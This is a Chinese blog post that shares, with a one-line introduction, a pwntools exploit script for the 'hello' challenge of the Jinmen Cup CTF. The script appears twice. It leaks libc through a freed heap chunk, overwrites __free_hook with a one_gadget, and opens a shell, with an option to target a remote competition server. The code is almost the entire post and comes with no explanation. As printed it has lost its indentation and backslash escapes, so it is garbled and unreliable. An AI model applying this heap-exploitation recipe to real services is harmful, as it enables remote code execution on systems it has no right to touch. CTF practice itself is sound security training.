津门杯pwnhello

127 阅读 0 评论 84 点赞

我是靠谱客的博主醉熏薯片，这篇文章主要介绍津门杯pwnhello，现在分享给大家，希望可以做个参考。

hello

复制代码

#!/usr/bin/env python2
# coding=utf-8
from pwn import *
arch = "amd64"
filename = "hello"
context(os="linux", arch=arch, log_level="debug")
content = 0
offset = 0
# elf
elf = ELF(filename)
free_got=elf.got['free']
# libc
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ogg_libc=[0x45226,0x4527a,0xf0364,0xf1207]
def add(num,name,size,info):
io.recvuntil("your choice>>")
io.sendline("1")
io.recvuntil("phone number:")
io.sendline(num)
io.recvuntil("name:")
io.sendline(name)
io.recvuntil("input des size:")
io.sendline(str(size))
io.recvuntil("des info:")
io.sendline(info)
def free(idx):
io.recvuntil("your choice>>")
io.sendline("2")
io.recvuntil("input index:")
io.sendline(str(idx))
def show(idx):
io.recvuntil("your choice>>")
io.sendline("3")
io.recvuntil("input index:")
io.sendline(str(idx))
def edit(idx,num,name,info):
io.recvuntil("your choice>>")
io.sendline("4")
io.recvuntil("input index:")
io.sendline(str(idx))
io.recvuntil("phone number:")
io.sendline(num)
io.recvuntil("name:")
io.sendline(name)
io.recvuntil("des info:")
io.sendline(info)
def b(addr):
bk = "b *$rebase" + str(addr)
gdb.attach(io, bk)
success("attach")
def main():
global io
if content == 0:
io = process("./" + filename)
else:
io = remote("119.3.81.43",49153)
num=b'aaaa'
name=b'b'*(8+5)
info=b'cccc'
add(num,b'cccc',0x60,info)
add(num, name, 0x70, b'/bin/shx00')
add(num, name, 0x80, info)
add(num, name, 0x80, info)
edit(3, num, name, info)
free(2)
b(0x0000000000000C32)
show(3)
io.recvuntil("des:")
malloc_hook=u64(io.recv(6).ljust(8,b'x00'))-88-0x10
###count####
libcbase=malloc_hook-libc.symbols['__malloc_hook']
ogg_addr=libcbase+ogg_libc[1]
sys_addr=libcbase+libc.symbols['system']
free_hook=libcbase+libc.symbols['__free_hook']
print("libcbase:",hex(libcbase))
#######
#name = b'b' * (8 + 5) +
b'x00' * (18)
#edit(0, num, name, info)
name=b'b'*(8+5)+p64(free_hook)
edit(0,num,name,info)
info=p64(ogg_addr)
edit(0, num, name, info)
free(1)
#b(0x0000000000000C32)
io.interactive()
main()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
#!/usr/bin/env python2
# coding=utf-8
from pwn import *
arch = "amd64"
filename = "hello"
context(os="linux", arch=arch, log_level="debug")
content = 0
offset = 0
# elf
elf = ELF(filename)
free_got=elf.got['free']
# libc
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ogg_libc=[0x45226,0x4527a,0xf0364,0xf1207]
def add(num,name,size,info):
io.recvuntil("your choice>>")
io.sendline("1")
io.recvuntil("phone number:")
io.sendline(num)
io.recvuntil("name:")
io.sendline(name)
io.recvuntil("input des size:")
io.sendline(str(size))
io.recvuntil("des info:")
io.sendline(info)
def free(idx):
io.recvuntil("your choice>>")
io.sendline("2")
io.recvuntil("input index:")
io.sendline(str(idx))
def show(idx):
io.recvuntil("your choice>>")
io.sendline("3")
io.recvuntil("input index:")
io.sendline(str(idx))
def edit(idx,num,name,info):
io.recvuntil("your choice>>")
io.sendline("4")
io.recvuntil("input index:")
io.sendline(str(idx))
io.recvuntil("phone number:")
io.sendline(num)
io.recvuntil("name:")
io.sendline(name)
io.recvuntil("des info:")
io.sendline(info)
def b(addr):
bk = "b *$rebase" + str(addr)
gdb.attach(io, bk)
success("attach")
def main():
global io
if content == 0:
io = process("./" + filename)
else:
io = remote("119.3.81.43",49153)
num=b'aaaa'
name=b'b'*(8+5)
info=b'cccc'
add(num,b'cccc',0x60,info)
add(num, name, 0x70, b'/bin/shx00')
add(num, name, 0x80, info)
add(num, name, 0x80, info)
edit(3, num, name, info)
free(2)
b(0x0000000000000C32)
show(3)
io.recvuntil("des:")
malloc_hook=u64(io.recv(6).ljust(8,b'x00'))-88-0x10
###count####
libcbase=malloc_hook-libc.symbols['__malloc_hook']
ogg_addr=libcbase+ogg_libc[1]
sys_addr=libcbase+libc.symbols['system']
free_hook=libcbase+libc.symbols['__free_hook']
print("libcbase:",hex(libcbase))
#######
#name = b'b' * (8 + 5) +
b'x00' * (18)
#edit(0, num, name, info)
name=b'b'*(8+5)+p64(free_hook)
edit(0,num,name,info)
info=p64(ogg_addr)
edit(0, num, name, info)
free(1)
#b(0x0000000000000C32)
io.interactive()
main()